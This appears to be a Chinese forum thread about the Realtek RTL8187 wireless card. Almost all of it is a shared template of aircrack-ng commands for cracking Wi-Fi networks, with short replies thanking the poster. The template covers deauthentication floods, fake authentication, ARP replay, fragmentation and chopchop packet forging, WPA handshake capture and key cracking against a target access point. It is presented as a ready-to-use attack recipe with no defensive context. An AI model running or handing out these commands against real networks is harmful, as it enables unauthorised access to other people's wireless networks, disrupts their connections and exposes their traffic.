Realtek RTL8187无线网卡
Realtek RTL8187无线网卡,修改后模板 收藏了 ,谢谢 !慢慢研究! 我改的就多了。不管有用没用的都加进去。ifconfig -a wlan0 up
airmon-ng start wlan0 <Channel>
airodump-ng --ivs -w <IVS_File> -c <Channel> wlan0
airodump-ng wlan0
aireplay-ng -1 0 -e <SSID> -a <ApMac> -h <MyMac> wlan0
..............autocrack................
aireplay-ng -0 0 -a <ApMac> -h <MyMac> wlan0..................................
wesside-ng -i wlan0 -v <ApMac>
----------- -2 Crack Mode-----------
aireplay-ng -2 -p 0841 -b <ApMac> wlan0
----------- -3 Crack Mode-----------
aireplay-ng -3-e <SSID> -b <ApMac> -h <MyMac> wlan0
----------- -4 Crack Mode-----------
aireplay-ng -4 -b <ApMac> -h <MyMac> wlan0
packetforge-ng -0 -a <ApMac> -h <MyMac> -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 wlan0
----------- -5 Crack Mode-----------
aireplay-ng -5 -b <ApMac> -h <MyMac> wlan0
packetforge-ng -0 -a <ApMac> -h <MyMac> -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 wlan0
..............wpa..................
airodump-ng --b <ApMac> -c11 -w psk wlan0
aireplay-ng -0 5 -a <ApMac> -c <MyMac> wlan0
airodump-ng -w <IVS_File> -c 6 wlan0
-----------Crack Key-----------
aircrack-ng -n 128 -b <ApMac> <IVS_File>-01.ivs
aircrack-ng -w password.txt <IVS_File>
aircrack-ng -z -b <ApMac> wlan0 ........................ 太谢谢楼主的这个好东西 了:D :D :D